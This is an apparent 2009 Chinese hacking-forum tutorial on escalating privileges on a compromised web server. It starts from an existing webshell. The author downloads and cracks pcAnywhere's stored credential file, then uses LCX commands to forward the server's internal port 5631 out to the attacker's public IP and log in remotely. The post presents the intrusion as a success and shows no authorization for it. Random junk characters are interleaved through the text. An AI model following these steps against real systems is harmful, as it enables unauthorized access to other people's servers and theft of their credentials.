|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
7 ^ a; u+ H: W z2 m. z, f# f+ }- `) }4 N0 \3 s* |- K4 f
提权方法:pcanywhere+LCX
/ \7 @/ d8 N7 y5 Z) f3 |
' A9 y: c& {6 K- S5 ^获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。6 E% Z. A! R$ t" \ o' l I
% V" o% ?$ d" n$ D6 }. R/ g$ ~
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
9 G$ D$ m* G; x, d+ U2 F4 g
8 C3 N' m4 i1 i6 _0 Z7 d$ l: ?
5 P/ W* L& V$ @% W" R) d1 T查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
/ N% `! |4 ?1 E: _7 l
8 z* F+ u; W: R E, O( t9 q! R7 x6 U9 d! ]' \! r
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。/ {1 k$ w, m/ t( V4 U' H
% Q- r9 |( | Y. |+ R! I% y1 h- G8 b% z
3 ^; l; ~# F |
8 q& _+ `, S0 P( I$ p8 N由于服务器在内网,那我们就要做端口转发,又要用到LCX啦`` y1 a/ ]' C/ l
" H5 S! q' f/ b- \ h+ ]- a% a) x
: B& y6 e) o# }% BLCX的用法再简单说下:
1 ]% ~2 M* \8 A1 y9 l( q3 V& A' x6 @7 J# a3 Q/ ^
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
5 B0 K% s# ~' I* _7 a/ D3 M. C
; T# W7 p! p- F- D/ ~) B本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)& I; p3 T# W2 q2 l/ [" K2 S$ p
0 z b8 E) K, t5 v0 Z: V
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。; X" o; W" Z% l$ N0 S/ M, z% i
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
0 u$ s" F$ V2 [8 t) u: ?; D2 B- f6 z+ e' w
; N' r7 E. u n9 o( B* b
; x3 R+ v) a0 z% T/ e- h
' p( I9 x3 [- g c7 C p- F5 q3 G呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
1 D( q/ B3 Q8 E+ S
; [) Z }- y9 U6 O& ]$ c$ k& O, G7 D* A) N
+ s4 X" ~! }# C6 F0 B/ W" D0 i4 q8 z9 p( O/ @7 X; e1 O
我们本地连接试试,输入我们刚破解的账号密码, I8 ~% t+ F' L, K
1 @; a; [+ X; D* H! A( m! Y1 U0 c9 q+ A# @5 U( v
呵呵``连接成功,服务器不错,又一个8核^︵^9 L1 F5 y% q7 B4 o: u: q1 t9 C# p; K' w
2 [$ H E; `' S, y! H" I) v9 \
+ f. Q- n7 J$ ~! T
3 ~7 ?9 s3 H z5 w; h |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
